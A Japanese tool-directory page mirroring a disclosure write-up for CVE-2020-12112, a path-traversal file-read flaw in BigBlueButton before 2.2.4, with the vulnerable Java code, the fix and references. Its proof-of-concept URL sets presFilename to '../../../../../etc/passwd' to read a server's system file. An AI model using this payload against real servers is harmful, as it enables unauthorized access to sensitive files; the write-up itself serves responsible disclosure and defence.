Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2020-12112 — BigBlueButtonのバージョン2.2.4よりも低いバージョンには、機密ファイルへのアクセスを許可するLFI脆弱性があります。🚨 | Kitploit
ツール/GitHubGitHub/tchenu/cve-2020-12112
脆弱性分析エクスプロイトウェブアプリケーション悪用情報収集ペネトレーションテスト
GitHubtchenu/cve-2020-12112

CVE-2020-12112

BigBlueButtonのバージョン2.2.4よりも低いバージョンには、機密ファイルへのアクセスを許可するLFI脆弱性があります。🚨

リポジトリを見る
1444ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2020-12112 🚨

BigBlueButton バージョン 2.2.4 未満には、機密ファイルへのアクセスを許可する LFI 脆弱性があります。

ストーリー 📜

BigBlueButton インスタンスを使った遠隔授業中、クラスの生徒が先生のスライドプレゼンテーションのリンクを共有したところ、URL にファイル名が含まれていることに気づきました。

学校のSlack

Student: "No need to write notes, I've got the slide."
Me: Well, I've got a security report to make. 😂

少し操作することで、サーバーの /etc/passwd ファイルにアクセスできるようになり、オープンソースの Big Blue Button ソリューションにセキュリティ脆弱性が存在することを発見しました。

脆弱性を報告したところ、BBB チームはすぐに対応し、数日以内に脆弱性を修正してくれました。

Poc 🧙

public File getDownloadablePresentationFile(String meetingId, String presId, String presFilename) {
	log.info("Find downloadable presentation for meetingId={} presId={} filename={}", meetingId, presId, presFilename);

    File presDir = Util.getPresentationDir(presentationBaseDir, meetingId, presId);
    return new File(presDir.getAbsolutePath() + File.separatorChar + presFilename);
}

https://github.com/bigbluebutton/bigbluebutton/blob/v2.2.3/bbb-common-web/src/main/java/org/bigbluebutton/api/RecordingService.java#L90

ご覧のとおり、PresentationController で使用されるこのメソッドは、3 つのパラメータを連結してプレゼンテーションファイルをダウンロードできるようにしています。

  • ファイルの絶対パス
  • 区切り文字
  • ファイル名

これにより、次のようなリンクを取得できます。

https://test.bigbluebutton.org/bigbluebutton/presentation/download/ffc98830dbfbac3dcc80cc4c5f30711ebd1c23e8-1586764259489/d2d9a672040fbde2a47a10bf6c37b6a4b5ae187f-1586764259500?presFilename=d2d9a672040fbde2a47a10bf6c37b6a4b5ae187f-1586764259500.pdf

脆弱性を悪用するには、プレゼンテーションファイルの有効なリンクを取得し、presFilename パラメータを変更して機密ファイルにアクセスするだけです。

https://test.bigbluebutton.org/bigbluebutton/presentation/download/ffc98830dbfbac3dcc80cc4c5f30711ebd1c23e8-1586764259489/d2d9a672040fbde2a47a10bf6c37b6a4b5ae187f-1586764259500?presFilename=../../../../../etc/passwd

/etc/passwd ファイル

パッチ 🤕

BBB チームは、サーバー設定ルール (HTTP)、正規表現、および正確なファイル名形式を使用して、2.2.4 バージョンで脆弱性を修正しました。

		location /bigbluebutton/presentation/download {
			return 404;
		}

		location ~ "^/bigbluebutton/presentation/download\/[0-9a-f]+-[0-9]+/[0-9a-f]+-[0-9]+$" {
			if ($arg_presFilename !~ "^[0-9a-f]+-[0-9]+\.[0-9a-zA-Z]+$") {
				return 404;
			}
			proxy_pass         http://127.0.0.1:8090$uri$is_args$args;
			proxy_set_header   X-Forwarded-For   $proxy_add_x_forwarded_for;
			# Workaround IE refusal to set cookies in iframe
			add_header P3P 'CP="No P3P policy available"';
		}

https://github.com/bigbluebutton/bigbluebutton/commit/5ebdf5ca7718fc8bb3c08867edd150278e6a724c#diff-c7d77969a4547b5349e55c5466948a27R45

参考文献 🔍

  • https://nvd.nist.gov/vuln/detail/CVE-2020-12112
  • https://github.com/bigbluebutton/bigbluebutton/blob/master/bigbluebutton-web/grails-app/controllers/org/bigbluebutton/web/controllers/PresentationController.groovy
  • https://github.com/bigbluebutton/bigbluebutton/commit/5ebdf5ca7718fc8bb3c08867edd150278e6a724c
  • https://twitter.com/thibeault_chenu/status/1249976515917422593
  • https://twitter.com/bigbluebutton/status/1252706369486180353
ツールをダウンロード